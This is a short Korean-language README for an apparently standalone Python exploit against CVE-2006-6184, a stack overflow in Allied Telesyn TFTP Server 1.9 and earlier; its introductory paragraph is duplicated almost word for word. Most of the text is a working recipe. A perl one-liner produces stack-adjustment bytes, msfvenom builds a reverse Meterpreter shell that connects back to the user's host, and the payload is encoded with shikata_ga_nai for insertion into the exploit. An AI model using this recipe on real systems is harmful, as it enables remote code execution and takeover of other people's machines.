
이것은 CVE-2006-6184용 Python 기반 독립 실행형 익스플로잇입니다. 이 익스플로잇은 Allied Telesyn TFTP Server (AT-TFTP) 1.9 및 이전 버전에서 스택 기반 버퍼 오버플로를 트리거하여 원격 공격자가 서비스 거부를 일으키거나 임의 코드를 실행할 수 있게 합니다.
이것은 CVE-2006-6184를 위한 파이썬 기반 독립 실행형 익스플로잇입니다. 이 익스플로잇은 Allied Telesyn TFTP Server (AT-TFTP) 1.9 및 이전 버전에서 스택 기반 버퍼 오버플로우를 트리거하여 원격 공격자가 서비스 거부를 일으키거나 임의 코드를 실행할 수 있게 합니다.
페이로드는 사용자의 IP 주소와 리스닝 포트를 포함하도록 사용자 정의해야 하므로 수동으로 생성해야 합니다. 다음 단계를 사용하세요:
1.) 스택 포인터에서 빼야 할 양(3500)의 16진수 파일을 생성하려면 다음을 입력하세요:
perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj
2.) 다음으로, 다음 명령어를 사용하여 스테이징된 Meterpreter 셸 페이로드를 생성하세요:
msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=[your IP] LPORT=[your port] R > payload
3.) 그런 다음, 방금 만든 두 파일을 결합하세요.
cat stackadj payload > shellcode
4.) 마지막으로, 잘못된 문자를 제거하겠습니다.
msfvenom -p generic/custom PAYLOADFILE=./shellcode -b "\x00" -e x86/shikata_ga_nai -f python
출력을 "payload" 변수의 값으로 입력하세요. 이 익스플로잇이 작동하려면 몇 번 실행해야 할 수도 있습니다.